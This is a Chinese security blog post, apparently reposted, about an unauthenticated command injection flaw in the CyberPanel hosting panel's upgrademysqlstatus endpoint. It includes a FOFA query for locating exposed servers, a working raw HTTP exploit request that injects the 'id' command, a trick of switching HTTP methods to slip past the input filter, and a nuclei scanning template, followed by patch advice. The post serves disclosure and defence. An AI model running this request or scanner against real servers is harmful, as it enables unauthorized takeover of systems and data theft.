Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

admin 2024年11月4日10:31:43评论42 views字数 1635阅读5分27秒阅读模式
01漏洞介绍

CyberPanel 控制面板

存在远程命令执行漏洞(QVD-2024-44346)

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

【产品介绍】

CyberPanel 是一款运行在 LiteSpeed Web Server 上的主机管理软件,由国外团队用 JavaScript 和 Python 3 编写。它具有网站管理(便捷建站、SSL 设置)、数据库管理(可视化操作、备份恢复)、用户与权限管理(创建不同权限用户及经销商用户)等功能,还有邮件、FTP 服务及安全工具集成等,有免费版和企业版,适用于多种用户,操作界面简洁,性能出色。
【漏洞介绍】
CyberPanel存在upgrademysqlstatus远程命令执行漏洞(QVD - 2024 - 44346)。该漏洞源于upgrademysqlstatus接口未做身份验证和参数过滤,使得未授权的攻击者能够通过此接口执行任意命令,进而获取服务器权限,可能造成数据泄露、服务器被接管等严重后果。目前该漏洞技术细节与EXP已在互联网上公开,影响范围较大。
网络安全
共筑防线
Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

02漏洞复现
分析、复现
Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

【FOFA】

app="CyberPanel"

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

【漏洞分析】

参考https://mp.weixin.qq.com/s/Hi0zcygdis_oPZ0k-xIBSg,

根据补丁分析:https://github.com/usmannasir/cyberpanel/commit/5b08cd6d53f4dbc2107ad9f555122ce8b0996515

在文件:databases/views.py增加了权限验证:

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

相关接口:

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

可以发现对POST请求有过滤:

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

【漏洞复现】

访问如下请求即可

OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close

{"statusfile":"/dev/null; id; #"}


注意:之所以需要将请求头换成 OPTIONS、PUT、PATCH 等 HTTP 方法,是为了绕过恶意字符过滤器。因为某些情况下,常规的请求方式可能会受到过滤器的限制,而采用这些特定的 HTTP 方法能够避开过滤器的检测,从而使攻击者有可能利用相关漏洞进行恶意操作。

成功访问:

Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

【nuclei脚本】

id: cyberpanel-upgrademysqlstatus-rce

info:
name: cyberpanel-upgrademysqlstatus-rce
author: PokerSec
severity: critical
metadata:
fofasearch: app="CyberPanel"

http:
- raw:
- |
OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Type: application/json
Connection: close

{"statusfile":"1;id;#"}

matchers:
- type: dsl
dsl:
- status_code==200 && contains_all(body,"uid=") && contains_all(body,"gid=")


【修复建议】

官方已在V2.3.7版本修复
https://github.com/usmannasir/cyberpanel/tree/v2.3.7
03

原文始发于微信公众号(东方隐侠安全团队):漏洞分析|Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月4日10:31:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cyber​​Panel 控制面板存在远程命令执行漏洞(QVD-2024-44346)https://cn-sec.com/archives/3349134.html

发表评论

匿名网友 填写信息